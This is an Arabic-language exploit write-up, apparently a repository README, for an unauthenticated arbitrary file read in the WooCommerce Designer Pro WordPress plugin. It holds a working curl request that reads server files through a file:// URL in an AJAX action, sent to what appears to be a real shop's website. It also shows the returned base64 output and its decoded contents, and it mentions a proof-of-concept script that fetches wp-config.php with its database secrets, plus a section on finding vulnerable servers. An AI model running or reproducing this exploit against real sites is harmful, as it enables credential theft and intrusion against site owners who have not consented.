
WooCommerce Designer Pro <= 1.9.28 - قراءة ملفات عشوائية بدون مصادقة
WooCommerce هو إضافة تجارة إلكترونية مفتوحة المصدر لـ WordPress تحوّل المواقع إلى متاجر عبر الإنترنت. WooCommerce Designer Pro هي إضافة WordPress مطوَّرة بواسطة JMA Plugins تتيح للعملاء تصميم وتخصيص المنتجات مباشرةً على متاجر WooCommerce.
مهم: WooCommerce وWooCommerce Designer Pro مختلفتان تمامًا.
يدعم WooCommerce Designer Pro إنشاء بطاقات الأعمال، والبطاقات البريدية، والنشرات، والملصقات، والتيشيرتات، والملصقات اللاصقة، وغيرها من المواد القابلة للطباعة، مع ميزات مثل دعم ألوان CMYK، وتوليد ملفات PDF، وواجهة تصميم قائمة على اللوحة (Canvas). تتكامل الإضافة مع WooCommerce للسماح بتخصيص المنتجات في الوقت الفعلي قبل الشراء، مما يجعلها مناسبة لأعمال الطباعة عبر الإنترنت ومتاجر المنتجات المخصصة.
CVE-2025-10897 هي ثغرة قراءة ملفات تعسفية بدون مصادقة في WooCommerce Designer Pro حتى الإصدار 1.9.28 (CWE-22). يرسل المهاجم طلب POST /wp-admin/admin-ajax.php مع action=wcdp_convert_resource_cmyk وعنوان URL بصيغة file:// يشير إلى ملفات الخادم مثل /etc/passwd أو wp-config.php. تعيد الإضافة محتويات الملف في استجابة JSON. وهذا يمكن أن يسرّب كلمات مرور قاعدة البيانات وأسرارًا أخرى من wp-config.php دون الحاجة إلى أي حساب WordPress.
الطلب
curl -sk -X POST 'https://www.procolorprints.ca/wp-admin/admin-ajax.php' \
-H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept: */*' \
-H 'Connection: close' \
-d 'action=wcdp_convert_resource_cmyk&url=file:///etc/os-release'
الاستجابة
{"string":"data:image\/jpg;base64,TkFNRT0iQWxtYUxpbnV4IgpWRVJTSU9OPSI5LjggKE9saXZlIEphZ3VhcikiCklEPSJhbG1hbGludXgiCklEX0xJS0U9InJoZWwgY2VudG9zIGZlZG9yYSIKVkVSU0lPTl9JRD0iOS44IgpQTEFURk9STV9JRD0icGxhdGZvcm06ZWw5IgpQUkVUVFlfTkFNRT0iQWxtYUxpbnV4IDkuOCAoT2xpdmUgSmFndWFyKSIKQU5TSV9DT0xPUj0iMDszNCIKTE9HTz0iZmVkb3JhLWxvZ28taWNvbiIKQ1BFX05BTUU9ImNwZTovbzphbG1hbGludXg6YWxtYWxpbnV4Ojk6OmJhc2VvcyIKSE9NRV9VUkw9Imh0dHBzOi8vYWxtYWxpbnV4Lm9yZy8iCkRPQ1VNRU5UQVRJT05fVVJMPSJodHRwczovL3dpa2kuYWxtYWxpbnV4Lm9yZy8iCkJVR19SRVBPUlRfVVJMPSJodHRwczovL2J1Z3MuYWxtYWxpbnV4Lm9yZy8iCgpBTE1BTElOVVhfTUFOVElTQlRfUFJPSkVDVD0iQWxtYUxpbnV4LTkiCkFMTUFMSU5VWF9NQU5USVNCVF9QUk9KRUNUX1ZFUlNJT049IjkuOCIKUkVESEFUX1NVUFBPUlRfUFJPRFVDVD0iQWxtYUxpbnV4IgpSRURIQVRfU1VQUE9SVF9QUk9EVUNUX1ZFUlNJT049IjkuOCIKU1VQUE9SVF9FTkQ9MjAzMi0wNi0wMQo=","success":true}
الاستجابة بعد فك ترميز Base64:
NAME="AlmaLinux"
VERSION="9.8 (Olive Jaguar)"
ID="almalinux"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.8"
PLATFORM_ID="platform:el9"
PRETTY_NAME="AlmaLinux 9.8 (Olive Jaguar)"
ANSI_COLOR="0;34"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:almalinux:almalinux:9::baseos"
HOME_URL="https://almalinux.org/"
DOCUMENTATION_URL="https://wiki.almalinux.org/"
BUG_REPORT_URL="https://bugs.almalinux.org/"
ALMALINUX_MANTISBT_PROJECT="AlmaLinux-9"
ALMALINUX_MANTISBT_PROJECT_VERSION="9.8"
REDHAT_SUPPORT_PRODUCT="AlmaLinux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.8"
SUPPORT_END=2032-06-01
python CVE-2025-10897-X7.py
ملاحظة: يحاول سكربت إثبات المفهوم الخاص بنا الحصول على wp-config.php، ولكن قد يكون الهدف قد ثبّت WordPress في مكان مختلف عن /var/www.
وسائط البحث عن الخوادم المعرضة للثغرات
هذا المستودع ومحتوياته مُقدَّمة بدقة لأغراض أبحاث الأمان المشروعة، واختبار الاختراق المصرح به، والدراسة التعليمية، والأغراض الدفاعية. بوصولك إلى هذه المواد أو استخدامها، فإنك تقر بالمسؤولية الكاملة عن ضمان امتثال أنشطتك لجميع القوانين المعمول بها، وحصولك على التفويض المناسب قبل اختبار هذه التقنيات أو تطبيقها على أي نظام لا تملكه.
لا يتحمل مؤلفو هذا المشروع والقائمون عليه أي مسؤولية عن أي أضرار أو عواقب قانونية أو إساءة استخدام ناتجة عن تطبيق هذه المعلومات. أي استخدام للوصول غير المصرح به أو الأنشطة الخبيثة أو الأغراض غير القانونية محظور صراحةً وغير مدعوم.
استخدم بمسؤولية. التزم بالقانون. اختبر فقط ما تملكه أو لديك إذن كتابي صريح لاختباره.
SCT-PL